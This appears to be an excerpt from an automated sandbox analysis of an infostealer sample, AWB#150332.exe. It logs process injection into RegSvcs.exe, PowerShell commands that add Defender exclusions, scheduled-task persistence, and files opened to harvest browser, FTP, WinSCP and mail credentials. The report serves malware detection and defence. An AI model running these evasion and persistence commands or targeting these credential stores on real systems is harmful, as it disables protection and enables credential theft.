Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C6A008
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D52008
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Queries volume information: C:\Users\user\Desktop\AWB#150332.exe VolumeInformation
Source: C:\Users\user\Desktop\AWB#150332.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\AWB#150332.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\AWB#150332.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\AWB#150332.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\AWB#150332.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Queries volume information: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\AWB#150332.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7200, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
